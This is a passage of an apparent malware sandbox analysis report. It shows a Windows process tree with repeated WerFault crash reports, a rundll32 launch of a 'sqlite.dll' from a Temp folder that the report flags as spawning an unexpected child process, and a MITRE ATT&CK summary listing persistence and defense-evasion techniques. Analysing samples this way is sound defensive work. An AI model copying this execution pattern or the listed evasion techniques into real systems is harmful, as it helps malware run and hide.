C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 5412 -ip 54121⤵PID:6884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6716 -ip 67161⤵PID:6312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 6708 -ip 67081⤵PID:2900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5492 -ip 54921⤵PID:4576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 240 -ip 2401⤵PID:5492
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 7000 -ip 70001⤵PID:5668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7280 -ip 72801⤵PID:8076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1888 -ip 18881⤵PID:7976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7288 -ip 72881⤵PID:8144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6948 -ip 69481⤵PID:4816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3804 -ip 38041⤵PID:7836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 7324 -ip 73241⤵PID:8112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1548 -ip 15481⤵PID:3300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5440 -ip 54401⤵PID:8100
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:6564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 4562⤵
- Program crash
PID:5572
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6564 -ip 65641⤵PID:6280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7256 -ip 72561⤵PID:7248
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 6940 -ip 69401⤵PID:6552
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵PID:2568
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵PID:7188
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵PID:5792
-
-
-
C:\Program Files (x86)\Windows Media Player\setup_wm.exe"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding2⤵PID:7404
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"1⤵PID:5960
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:6752
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3954055 /state1:0x41c64e6d1⤵PID:6768
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
4Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1